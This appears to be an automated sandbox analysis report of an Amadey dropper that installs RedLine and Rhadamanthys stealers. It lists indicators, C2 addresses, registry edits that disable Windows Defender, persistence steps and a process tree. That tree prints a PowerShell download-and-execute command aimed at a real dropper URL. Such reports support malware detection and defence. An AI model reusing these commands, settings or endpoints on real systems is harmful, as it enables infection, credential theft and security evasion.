amadey | 8cc8e6ea58053af047c4b86972d03961a1d20e86fb6744501b1f916fdbf89de2

Analysis

max time kernel
150s
max time network
142s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
21-03-2023 14:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8cc8e6ea58053af047c4b86972d03961a1d20e86fb6744501b1f916fdbf89de2.exe
Size

1.0MB
MD5

abf258ebee46c489ad173063aec91689
SHA1

f821068f65da4c1243a4f90515e25245a3b7b201
SHA256

8cc8e6ea58053af047c4b86972d03961a1d20e86fb6744501b1f916fdbf89de2
SHA512

dec53aebadb66a696f69eb172ff98f30aea6738ec381d8e20b8ff554f4cd991b2e4484398c51c90717d069ad951a8aa60d179948f2fc0d2b1672155fce8ae639
SSDEEP

24576:tyGUVZIziudJcukVUYVHMwVDKoax3Ib2CLYRN+SKtj:IGUVZJvV9DKocIb2CLx

Score

10^/10

amadey redline rhadamanthys gena vint discovery evasion infostealer persistence spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://www.mdegmm.com/pdf/debug2.ps1

Extracted

Family

redline

Botnet

gena

193.233.20.30:4125

Attributes

auth_value
93c20961cb6b06b2d5781c212db6201e

Extracted

Family

redline

Botnet

vint

193.233.20.30:4125

Attributes

auth_value
fb8811912f8370b3d23bffda092d88d0

Extracted

Family

amadey

Version

3.68

62.204.41.87/joomla/index.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect rhadamanthys stealer shellcode 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/3948-4495-0x00000000008A0000-0x00000000008BC000-memory.dmp	family_rhadamanthys
behavioral1/memory/3948-4881-0x00000000008A0000-0x00000000008BC000-memory.dmp	family_rhadamanthys

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

tz7468.exev8115Ww.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	tz7468.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	v8115Ww.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	v8115Ww.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	tz7468.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	tz7468.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	tz7468.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	tz7468.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	v8115Ww.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	v8115Ww.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	v8115Ww.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 20 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4484-197-0x0000000002290000-0x00000000022D6000-memory.dmp	family_redline
behavioral1/memory/4484-199-0x0000000002780000-0x00000000027C4000-memory.dmp	family_redline
behavioral1/memory/4484-203-0x0000000002780000-0x00000000027BE000-memory.dmp	family_redline
behavioral1/memory/4484-204-0x0000000002780000-0x00000000027BE000-memory.dmp	family_redline
behavioral1/memory/4484-206-0x0000000002780000-0x00000000027BE000-memory.dmp	family_redline
behavioral1/memory/4484-208-0x0000000002780000-0x00000000027BE000-memory.dmp	family_redline
behavioral1/memory/4484-210-0x0000000002780000-0x00000000027BE000-memory.dmp	family_redline
behavioral1/memory/4484-212-0x0000000002780000-0x00000000027BE000-memory.dmp	family_redline
behavioral1/memory/4484-214-0x0000000002780000-0x00000000027BE000-memory.dmp	family_redline
behavioral1/memory/4484-216-0x0000000002780000-0x00000000027BE000-memory.dmp	family_redline
behavioral1/memory/4484-218-0x0000000002780000-0x00000000027BE000-memory.dmp	family_redline
behavioral1/memory/4484-220-0x0000000002780000-0x00000000027BE000-memory.dmp	family_redline
behavioral1/memory/4484-222-0x0000000002780000-0x00000000027BE000-memory.dmp	family_redline
behavioral1/memory/4484-224-0x0000000002780000-0x00000000027BE000-memory.dmp	family_redline
behavioral1/memory/4484-226-0x0000000002780000-0x00000000027BE000-memory.dmp	family_redline
behavioral1/memory/4484-228-0x0000000002780000-0x00000000027BE000-memory.dmp	family_redline
behavioral1/memory/4484-230-0x0000000002780000-0x00000000027BE000-memory.dmp	family_redline
behavioral1/memory/4484-232-0x0000000002780000-0x00000000027BE000-memory.dmp	family_redline
behavioral1/memory/4484-234-0x0000000002780000-0x00000000027BE000-memory.dmp	family_redline
behavioral1/memory/4484-236-0x0000000002780000-0x00000000027BE000-memory.dmp	family_redline

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys
Blocklisted process makes network request 4 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

25 1352 powershell.exe
26 4400 powershell.exe
27 1352 powershell.exe
29 4400 powershell.exe
Downloads MZ/PE file

flow	pid	process
25	1352	powershell.exe
26	4400	powershell.exe
27	1352	powershell.exe
29	4400	powershell.exe

.NET Reactor proctector 7 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\1000112001\Good.exe	net_reactor
C:\Users\Admin\AppData\Local\Temp\1000112001\Good.exe	net_reactor
C:\Users\Admin\AppData\Local\Temp\1000112001\Good.exe	net_reactor
behavioral1/memory/4052-1156-0x00000000002D0000-0x0000000000844000-memory.dmp	net_reactor
behavioral1/memory/4052-1157-0x0000000005170000-0x00000000051FE000-memory.dmp	net_reactor
behavioral1/memory/1352-2353-0x0000012DF35A0000-0x0000012DF35B0000-memory.dmp	net_reactor
C:\Users\Admin\AppData\Local\Temp\1000112001\Good.exe	net_reactor

Executes dropped EXE 16 IoCs

Processes:

zap2368.exezap1573.exezap0664.exetz7468.exev8115Ww.exew19IC34.exexRiht85.exey85IA23.exelegenda.exeGood.exesqlcmd.exesqlcmd.exeserv.exeGood.exelegenda.exelegenda.exe

pid	process
2112	zap2368.exe
4292	zap1573.exe
2740	zap0664.exe
2744	tz7468.exe
4176	v8115Ww.exe
4484	w19IC34.exe
3496	xRiht85.exe
1012	y85IA23.exe
4816	legenda.exe
4052	Good.exe
5112	sqlcmd.exe
4960	sqlcmd.exe
3948	serv.exe
4996	Good.exe
1768	legenda.exe
4220	legenda.exe

Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

2792 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
2792	rundll32.exe

Windows security modification 2 TTPs 3 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

tz7468.exev8115Ww.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	tz7468.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	v8115Ww.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	v8115Ww.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 9 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

zap0664.exezap2368.exezap1573.exeGood.exe8cc8e6ea58053af047c4b86972d03961a1d20e86fb6744501b1f916fdbf89de2.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	zap0664.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	zap2368.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	zap0664.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	zap2368.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	zap1573.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	zap1573.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000\Software\Microsoft\Windows\CurrentVersion\Run\MyTestApplication = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000112001\\Good.exe"	Good.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	8cc8e6ea58053af047c4b86972d03961a1d20e86fb6744501b1f916fdbf89de2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	8cc8e6ea58053af047c4b86972d03961a1d20e86fb6744501b1f916fdbf89de2.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

31 ip-api.com
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

Processes:

serv.exe

pid process

3948 serv.exe
3948 serv.exe
3948 serv.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

Good.exe

description pid process target process

PID 4052 set thread context of 4996 4052 Good.exe Good.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	ioc
31	ip-api.com

pid	process
3948	serv.exe
3948	serv.exe
3948	serv.exe

description	pid	process	target process
PID 4052 set thread context of 4996	4052	Good.exe	Good.exe

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

serv.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	serv.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	serv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	serv.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	serv.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	serv.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

2120 schtasks.exe
Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXE

pid process

1496 PING.EXE
4336 PING.EXE
992 PING.EXE

pid	process
2120	schtasks.exe

pid	process
1496	PING.EXE
4336	PING.EXE
992	PING.EXE

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

tz7468.exev8115Ww.exew19IC34.exexRiht85.exepowershell.exepowershell.exe

pid	process
2744	tz7468.exe
2744	tz7468.exe
4176	v8115Ww.exe
4176	v8115Ww.exe
4484	w19IC34.exe
4484	w19IC34.exe
3496	xRiht85.exe
3496	xRiht85.exe
1352	powershell.exe
1352	powershell.exe
1352	powershell.exe
4400	powershell.exe
4400	powershell.exe
4400	powershell.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

Processes:

tz7468.exev8115Ww.exew19IC34.exexRiht85.exeGood.exepowershell.exepowershell.exeGood.exeserv.exe

description	pid	process
Token: SeDebugPrivilege	2744	tz7468.exe
Token: SeDebugPrivilege	4176	v8115Ww.exe
Token: SeDebugPrivilege	4484	w19IC34.exe
Token: SeDebugPrivilege	3496	xRiht85.exe
Token: SeDebugPrivilege	4052	Good.exe
Token: SeDebugPrivilege	1352	powershell.exe
Token: SeDebugPrivilege	4400	powershell.exe
Token: SeDebugPrivilege	4996	Good.exe
Token: SeShutdownPrivilege	3948	serv.exe
Token: SeCreatePagefilePrivilege	3948	serv.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

8cc8e6ea58053af047c4b86972d03961a1d20e86fb6744501b1f916fdbf89de2.exezap2368.exezap1573.exezap0664.exey85IA23.exelegenda.execmd.exesqlcmd.execmd.exesqlcmd.exe

description	pid	process	target process
PID 3012 wrote to memory of 2112	3012	8cc8e6ea58053af047c4b86972d03961a1d20e86fb6744501b1f916fdbf89de2.exe	zap2368.exe
PID 3012 wrote to memory of 2112	3012	8cc8e6ea58053af047c4b86972d03961a1d20e86fb6744501b1f916fdbf89de2.exe	zap2368.exe
PID 3012 wrote to memory of 2112	3012	8cc8e6ea58053af047c4b86972d03961a1d20e86fb6744501b1f916fdbf89de2.exe	zap2368.exe
PID 2112 wrote to memory of 4292	2112	zap2368.exe	zap1573.exe
PID 2112 wrote to memory of 4292	2112	zap2368.exe	zap1573.exe
PID 2112 wrote to memory of 4292	2112	zap2368.exe	zap1573.exe
PID 4292 wrote to memory of 2740	4292	zap1573.exe	zap0664.exe
PID 4292 wrote to memory of 2740	4292	zap1573.exe	zap0664.exe
PID 4292 wrote to memory of 2740	4292	zap1573.exe	zap0664.exe
PID 2740 wrote to memory of 2744	2740	zap0664.exe	tz7468.exe
PID 2740 wrote to memory of 2744	2740	zap0664.exe	tz7468.exe
PID 2740 wrote to memory of 4176	2740	zap0664.exe	v8115Ww.exe
PID 2740 wrote to memory of 4176	2740	zap0664.exe	v8115Ww.exe
PID 2740 wrote to memory of 4176	2740	zap0664.exe	v8115Ww.exe
PID 4292 wrote to memory of 4484	4292	zap1573.exe	w19IC34.exe
PID 4292 wrote to memory of 4484	4292	zap1573.exe	w19IC34.exe
PID 4292 wrote to memory of 4484	4292	zap1573.exe	w19IC34.exe
PID 2112 wrote to memory of 3496	2112	zap2368.exe	xRiht85.exe
PID 2112 wrote to memory of 3496	2112	zap2368.exe	xRiht85.exe
PID 2112 wrote to memory of 3496	2112	zap2368.exe	xRiht85.exe
PID 3012 wrote to memory of 1012	3012	8cc8e6ea58053af047c4b86972d03961a1d20e86fb6744501b1f916fdbf89de2.exe	y85IA23.exe
PID 3012 wrote to memory of 1012	3012	8cc8e6ea58053af047c4b86972d03961a1d20e86fb6744501b1f916fdbf89de2.exe	y85IA23.exe
PID 3012 wrote to memory of 1012	3012	8cc8e6ea58053af047c4b86972d03961a1d20e86fb6744501b1f916fdbf89de2.exe	y85IA23.exe
PID 1012 wrote to memory of 4816	1012	y85IA23.exe	legenda.exe
PID 1012 wrote to memory of 4816	1012	y85IA23.exe	legenda.exe
PID 1012 wrote to memory of 4816	1012	y85IA23.exe	legenda.exe
PID 4816 wrote to memory of 2120	4816	legenda.exe	schtasks.exe
PID 4816 wrote to memory of 2120	4816	legenda.exe	schtasks.exe
PID 4816 wrote to memory of 2120	4816	legenda.exe	schtasks.exe
PID 4816 wrote to memory of 392	4816	legenda.exe	cmd.exe
PID 4816 wrote to memory of 392	4816	legenda.exe	cmd.exe
PID 4816 wrote to memory of 392	4816	legenda.exe	cmd.exe
PID 392 wrote to memory of 3536	392	cmd.exe	cmd.exe
PID 392 wrote to memory of 3536	392	cmd.exe	cmd.exe
PID 392 wrote to memory of 3536	392	cmd.exe	cmd.exe
PID 392 wrote to memory of 3840	392	cmd.exe	cacls.exe
PID 392 wrote to memory of 3840	392	cmd.exe	cacls.exe
PID 392 wrote to memory of 3840	392	cmd.exe	cacls.exe
PID 392 wrote to memory of 4324	392	cmd.exe	cacls.exe
PID 392 wrote to memory of 4324	392	cmd.exe	cacls.exe
PID 392 wrote to memory of 4324	392	cmd.exe	cacls.exe
PID 392 wrote to memory of 4392	392	cmd.exe	cmd.exe
PID 392 wrote to memory of 4392	392	cmd.exe	cmd.exe
PID 392 wrote to memory of 4392	392	cmd.exe	cmd.exe
PID 392 wrote to memory of 5016	392	cmd.exe	cacls.exe
PID 392 wrote to memory of 5016	392	cmd.exe	cacls.exe
PID 392 wrote to memory of 5016	392	cmd.exe	cacls.exe
PID 392 wrote to memory of 4396	392	cmd.exe	cacls.exe
PID 392 wrote to memory of 4396	392	cmd.exe	cacls.exe
PID 392 wrote to memory of 4396	392	cmd.exe	cacls.exe
PID 4816 wrote to memory of 4052	4816	legenda.exe	Good.exe
PID 4816 wrote to memory of 4052	4816	legenda.exe	Good.exe
PID 4816 wrote to memory of 4052	4816	legenda.exe	Good.exe
PID 4816 wrote to memory of 5112	4816	legenda.exe	sqlcmd.exe
PID 4816 wrote to memory of 5112	4816	legenda.exe	sqlcmd.exe
PID 4816 wrote to memory of 5112	4816	legenda.exe	sqlcmd.exe
PID 5112 wrote to memory of 4272	5112	sqlcmd.exe	cmd.exe
PID 5112 wrote to memory of 4272	5112	sqlcmd.exe	cmd.exe
PID 4272 wrote to memory of 1352	4272	cmd.exe	powershell.exe
PID 4272 wrote to memory of 1352	4272	cmd.exe	powershell.exe
PID 4816 wrote to memory of 4960	4816	legenda.exe	sqlcmd.exe
PID 4816 wrote to memory of 4960	4816	legenda.exe	sqlcmd.exe
PID 4816 wrote to memory of 4960	4816	legenda.exe	sqlcmd.exe
PID 4960 wrote to memory of 4548	4960	sqlcmd.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\8cc8e6ea58053af047c4b86972d03961a1d20e86fb6744501b1f916fdbf89de2.exe
"C:\Users\Admin\AppData\Local\Temp\8cc8e6ea58053af047c4b86972d03961a1d20e86fb6744501b1f916fdbf89de2.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3012

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap2368.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap2368.exe
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2112

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap1573.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap1573.exe
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4292

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap0664.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap0664.exe
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2740

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz7468.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz7468.exe
5⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2744

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v8115Ww.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v8115Ww.exe
5⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4176

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w19IC34.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w19IC34.exe
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4484

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xRiht85.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xRiht85.exe
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3496

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y85IA23.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y85IA23.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1012

C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
"C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4816

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN legenda.exe /TR "C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe" /F
4⤵
- Creates scheduled task(s)
PID:2120

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "legenda.exe" /P "Admin:N"&&CACLS "legenda.exe" /P "Admin:R" /E&&echo Y|CACLS "..\f22b669919" /P "Admin:N"&&CACLS "..\f22b669919" /P "Admin:R" /E&&Exit
4⤵
- Suspicious use of WriteProcessMemory
PID:392

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5⤵
PID:3536

C:\Windows\SysWOW64\cacls.exe
CACLS "legenda.exe" /P "Admin:N"
5⤵
PID:3840

C:\Windows\SysWOW64\cacls.exe
CACLS "legenda.exe" /P "Admin:R" /E
5⤵
PID:4324

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5⤵
PID:4392

C:\Windows\SysWOW64\cacls.exe
CACLS "..\f22b669919" /P "Admin:N"
5⤵
PID:5016

C:\Windows\SysWOW64\cacls.exe
CACLS "..\f22b669919" /P "Admin:R" /E
5⤵
PID:4396

C:\Users\Admin\AppData\Local\Temp\1000112001\Good.exe
"C:\Users\Admin\AppData\Local\Temp\1000112001\Good.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4052

C:\Users\Admin\AppData\Local\Temp\1000112001\Good.exe
"C:\Users\Admin\AppData\Local\Temp\1000112001\Good.exe"
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4996

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\1000112001\Good.exe"
6⤵
PID:4920

C:\Windows\SysWOW64\chcp.com
chcp 65001
7⤵
PID:4524

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
7⤵
- Runs ping.exe
PID:1496

C:\Users\Admin\AppData\Local\Temp\1000114001\sqlcmd.exe
"C:\Users\Admin\AppData\Local\Temp\1000114001\sqlcmd.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5112

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')"
5⤵
- Suspicious use of WriteProcessMemory
PID:4272

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')
6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1352

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000114001\sqlcmd.exe" >> NUL
5⤵
PID:3960

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:4336

C:\Users\Admin\AppData\Local\Temp\1000115001\sqlcmd.exe
"C:\Users\Admin\AppData\Local\Temp\1000115001\sqlcmd.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4960

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')"
5⤵
PID:4548

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')
6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4400

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000115001\sqlcmd.exe" >> NUL
5⤵
PID:1772

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:992

C:\Users\Admin\AppData\Local\Temp\1000116001\serv.exe
"C:\Users\Admin\AppData\Local\Temp\1000116001\serv.exe"
4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:3948

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
4⤵
- Loads dropped DLL
PID:2792

C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
1⤵
- Executes dropped EXE
PID:1768

C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
1⤵
- Executes dropped EXE
PID:4220

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5080DC7A65DB6A5960ECD874088F3328_862BA1770B2FEE013603D2FF9ABEAFDA
Filesize
2KB

MD5
fc88b7748eb4cd37ae886a1c0813e4cf

SHA1
23e30b76fc94f0467a3efad342a91a3b84ff1eea

SHA256
3d81e317f8816680185517d7719e51fdbcd5807f9c629c4e3d0408820ec458da

SHA512
bb8ffaa2e8e581aa8d9a2e39b5f16c784d1431b4c18acc71b8fea84a4982d13a8ed1e5cf295c459ca35d8d4604c050210e0771386e7fe57d35c5ccd41fb92211

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_2DBE917624E9880FE0C7C5570D56E691
Filesize
1KB

MD5
cb684ec7fe8555f949182c7423dafdc2

SHA1
ec49f7b4b777fa1da40af5328785782127ffc52c

SHA256
8e17b090e2d07abf04860e961e601d8c663d3eaafd16190e6e6b6a4f018c0b0e

SHA512
ef627ca15ac143710b707ce28bd0cbe3447446db64c61f89d78f7c868cad07bd267563a7927ac4cd733adf2da3d58dcfadba54f8e0bc78e06d79cd389b77e500

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5080DC7A65DB6A5960ECD874088F3328_862BA1770B2FEE013603D2FF9ABEAFDA
Filesize
482B

MD5
467215c8c29f490229837a4f305ff2a2

SHA1
f80d4b6e2f45089c3b4e56d35708edb6d299cccf

SHA256
2824c02ff6f69ae1433b2839d073c722a3c3efe9aa51e484126b343678b82fd6

SHA512
514a45a7921ef81712d457772399ef45630f6f8496cc85d2c6725c937ac1b0f638a335c6576325a8f9c8173dba0b2bc0ff132ab016cb58fd832a62976e15d062

Download Submit
